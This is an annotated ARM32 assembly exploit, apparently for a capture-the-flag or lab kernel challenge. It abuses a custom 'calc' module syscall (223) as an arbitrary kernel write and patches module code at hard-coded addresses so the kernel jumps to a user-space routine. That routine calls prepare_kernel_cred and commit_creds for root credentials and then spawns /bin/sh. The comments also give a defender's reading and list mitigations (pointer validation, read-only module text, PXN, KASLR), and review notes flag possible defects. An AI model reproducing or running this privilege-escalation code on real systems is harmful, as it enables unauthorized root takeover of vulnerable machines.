SYSCALL ARM
/*
 * Data section: the execve path and a scratch word that the custom syscall
 * in _start receives as its output pointer.
 * Syntax note: ARM32 GNU as; comments are C-style ("@" also works, but a
 * ";" is a statement separator here, not a comment).
 */
.data
sh:
.asciz "//bin/sh" /* NUL-terminated; the doubled slash resolves to the same path as /bin/sh */
result:
.word 0x00000000 /* 4th argument of the last syscall in _start; no .align precedes it, so it may land unaligned — TODO confirm */
.text
.global _start
/*
 * Entry point. Linux/ARM EABI syscall convention: r7 = number, r0-r3 = arguments,
 * svc #0, result in r0. Every call below uses r7 = 223, a non-standard syscall that
 * the comments attribute to a "calc" kernel module. Judging only by the arguments
 * (r0 = a, r1 = operator character, r2 = b, r3 = destination pointer) it presumably
 * stores a <op> b at the address in r3; the module is not on this page, so that is
 * the author's description, not something verified here.
 * C shape per the author:
 *   syscall(223, a, o, b, &r);
 *
 * Defender's reading: the destination pointer comes straight from user space and the
 * targets written below are kernel-module addresses, i.e. the module exposes an
 * arbitrary kernel write. Validating the output pointer (access_ok()/put_user()) and
 * keeping module text read-only (CONFIG_STRICT_MODULE_RWX) close this class of bug;
 * the fixed addresses also rely on one known build layout (no KASLR).
 *
 * Every address is hard-coded: 0x7f0001bc, +4, +8, +12 (commented as the module's
 * code) and the user-space label `elevate`. Valid only for the exact image they were
 * taken from.
 */
_start:
/*
 * Write jump to `elevate`: four consecutive words at 0x7f0001bc .. 0x7f0001c8.
 * 124 is ASCII '|', so each call is presumably (r0 | 0) = r0 stored to [r3].
 */
ldr r0, =0xea000000 /* first instruction word of the jump */
ldr r1, =124 /* operand | */
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
ldr r3, =0x7f0001bc /* location of + branch operand in module code */
mov r7, #223 /* syscall 223 -> calc */
svc #0
ldr r0, =0x00000000 /* second word */
ldr r1, =124 /* operand | */
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
ldr r3, =0x7f0001c0 /* location of + branch operand plus 4 in module code */
mov r7, #223 /* syscall 223 -> calc */
svc #0
ldr r0, =0xe51ff004 /* third word */
ldr r1, =124 /* operand | */
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
ldr r3, =0x7f0001c4 /* location of + branch operand plus 8 in module code */
mov r7, #223 /* syscall 223 -> calc */
svc #0
/*
 * Address of the jump: the fourth word is the user-space address of `elevate`
 * (literal-pool load of the label).
 */
ldr r0, =elevate
ldr r1, =124 /* operand | */
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
ldr r3, =0x7f0001c8 /* location of + branch operand plus 12 in module code */
mov r7, #223 /* syscall 223 -> calc */
svc #0
/*
 * Read our elevate function and jump to it: one more call through the now-patched
 * module code (8 + 8, result to `result`). The author's comment says this is what
 * transfers control to `elevate`; that depends on the module, not on anything
 * visible here.
 */
ldr r0, =8
ldr r1, =43 /* operand + */
ldr r2, =8
ldr r3, addr_of_result /* PC-relative load of the word after `shell`: r3 = &result */
mov r7, #223 /* syscall 223 -> calc */
svc #0
/*
 * We have the root uid, so let's open a shell
 */
b shell
/* Unreachable: the branch above is unconditional and nothing jumps to _exit. */
_exit:
mov r7, #1 /* syscall 1 = exit */
svc #0
/*
 * Get root uid. Per the header comment this runs once the patched module code
 * branches here, i.e. the kernel executes a user-mapped label — the pattern that
 * ARM PXN (privileged execute-never) exists to block.
 * r0 = 0 is the argument to the first call; both bl targets are absolute kernel
 * addresses the author annotated as prepare_kernel_cred and commit_creds, valid for
 * one specific kernel image only. Returns via lr.
 * NOTE(review): bl has a ±32 MB reach, so whether these branches even encode
 * depends on where this object is linked — TODO confirm against the author's build.
 */
elevate:
mov r0, #0 /* argument to the first call */
bl 0x80042464 /* prepare_kernel_cred */
bl 0x80042148 /* commit_creds; r0 still holds the previous call's return value */
bx lr
/*
 * Open a shell: execve("//bin/sh", {sh, NULL}, NULL).
 * ARM EABI: r7 = 0xb (execve), r0 = path, r1 = argv, r2 = envp.
 * argv is built on the stack with two pushes (NULL terminator, then the path).
 * If execve returns (failure), execution falls through into the two literal
 * words below; nothing reaches _exit.
 */
shell:
ldr r0, =sh /* r0 = path */
sub r2, r2, r2 /* r2 = 0: envp = NULL */
push {r2} /* argv[1] = NULL */
push {r0} /* argv[0] = path; sp now points at {sh, NULL} */
mov r1, sp /* r1 = argv */
mov r7, #0xb /* syscall 11 = execve */
svc #0
addr_of_sh: .word sh /* not referenced on this page */
addr_of_result: .word result /* literal read by `ldr r3, addr_of_result` in _start */